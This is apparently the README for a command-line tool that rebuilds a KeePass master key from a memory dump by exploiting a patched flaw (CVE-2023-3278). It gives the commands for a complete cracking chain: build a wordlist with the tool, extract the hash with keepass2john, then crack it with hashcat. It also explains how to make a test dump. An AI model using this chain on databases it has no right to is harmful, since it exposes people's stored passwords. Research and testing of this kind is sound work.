Find and collect parts of a Keepass master key to recover it in plain text from a memory dump
While typing out the master key to unlock a KeePass database, the value of the input box is stored in memory. While it is visually hidden using '●' characters, the last character was briefly visible in memory and keeps being stored there (CVE-2023-3278, fixed in KeePass 2.54 released June 3rd 2023). That makes it possible to find strings like the following in the memory dump:
s
●e
●●c
●●●r
●●●●e
●●●●●t
This tool finds such strings and combines them into one password. Due to noise or retyping in the memory dump it will also print some false positives (especially for earlier characters), but with brute-forcing or a bit of common sense, these should be easy to filter out.
It differs from existing tools (like keepass-password-dumper or keepass-dump-masterkey) in speed, the various useful output formats, and its ability to extract non-ASCII character in UTF16 encoding. If the master key uses Unicode characters like 'ø', this tool will be able to find those too (iykyk).
cargo install keepass-dump-extractorOr download and extract a pre-compiled binary from the Releases page.
This attack requires a memory dump of the KeePass process and can generate all possible master keys to unlock the KeePass database file (.kdbx). With the following commands, you can generate a wordlist, extract the hash from the database, and crack it with the wordlist:
keepass-dump-extractor KeePass.DMP -f all > wordlist.txt
keepass2john passwords.kdbx > passwords.kdbx.hash
hashcat -m 13400 --username passwords.kdbx.hash wordlist.txtWithin a few seconds, you should be able to find the password with this method if most of the typed master key was inside of the memory dump. For more complex cases where there is limited information, however, some different output formats might allow you to manually find what fits.
The -f (--format) option allows you to choose an output format that fits your use case the best. Here are its possible values:
Warning
The following output examples were artificially made clearer by adding a first character, but in reality, the first character cannot be recovered because it is not easily recognizable by a prefixed '●' in the memory dump.
Deduplicate and order unknowns by the number of occurrences, so the first character will likely be the correct one.
For example:
s
●e
●3
●●c
●●●r
●●●●e
●●●●3
●●●●●t
Group positions together to permute one position at a time. It is ordered by the number of occurrences, so the first character will likely be the correct one. Useful for manually comparing what letter fits best in between known letters.
For example:
secr●t
s3cr●t
s●cret
s●cr3t
Using the unknown characters, it generates the "cartesian product" meaning all possible passwords are output. This is useful for generating a wordlist for cracking tools like hashcat.
For example:
secret
s3cret
secr3t
secr3t
Print the raw results as this tool parses them, which is useful for scripts. It is also the only way to view how many times a character occurred at that position in the memory dump, normally this is only seen in the order.
For example:
10 0 s
10 1 e
2 1 3
10 2 c
10 3 r
1 4 3
10 4 e
10 5 t
To test out this tool and create your own memory dump, install a version of KeePass < 2.54, like 2.53. When installed, open the program and create and save a database in the .kdbx format.
Then to setup the memory dump, we will close and re-open the database file which will prompt for a password. Here, type out the master key you set for the database and unlock it. From here you can lock it again if you want to.
After this, we can generate the memory dump of the KeePass.exe process using Task Manager. This is done by right-clicking it and choosing "Create dump file":
After this is done, you can open the file location and run this tool over it for analysis.